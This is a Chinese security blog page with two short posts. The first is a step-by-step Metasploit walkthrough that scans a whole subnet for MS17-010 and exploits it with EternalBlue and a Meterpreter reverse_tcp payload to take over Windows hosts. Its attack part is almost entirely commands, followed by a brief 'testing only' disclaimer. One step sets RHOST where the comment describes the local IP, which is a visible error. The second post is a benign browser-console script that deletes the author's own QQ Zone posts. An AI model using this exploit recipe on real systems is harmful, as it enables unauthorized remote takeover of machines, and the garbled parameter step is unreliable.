Aipp_SecurityBlog 信言不美,美言不信。善者不辩,辩者不善。知者不博,博者不知。
Meterpreter下eternalblue模块利用
发表于 2018-1-24 | | technology
首先检查防火墙状态并关闭
[[email protected] ~]# msfconsole
启动msf

msf > search eternalblue
搜索模块

先扫描有漏洞主机
msf > use auxiliary/scanner/smb/smb_ms17_010
加载扫描模块

msf > set rhosts 192.168.2.1/24
设置扫描IP直接扫描C段

msf > run
开始扫描

扫出提示: Host is likely VULNERABLE to MS17-010!的可以尝试利用
6.png

msf  > use exploit/windows/smb/ms17_010_eternalblue
加载攻击模块

msf  >set RHOST 192.168.2.9
设置有漏洞的IP

msf  >set RHOST 192.168.2.3
设置本地本机IP


msf  >set payload windows/x64/meterpreter/reverse_tcp
设置payload

msf  >exploit
攻击

成功获取权限
ac.png

7.png

文章内容涉及具有攻击性,仅用作测试,严禁破坏,后果自负。

自动删除QQ空间说说脚本
发表于 2017-5-6 | | technology
进入我的说说
按F12
进入Console,回车

var delay = 1000;
function del() {
    document.querySelector('.app_canvas_frame').contentDocument.querySelector('.del_btn').click();
    setTimeout("yes()", delay);
}
function yes() {
    document.querySelector('.qz_dialog_layer_btn').click();
    setTimeout("del()", delay);
}
del();

等待完成
TOP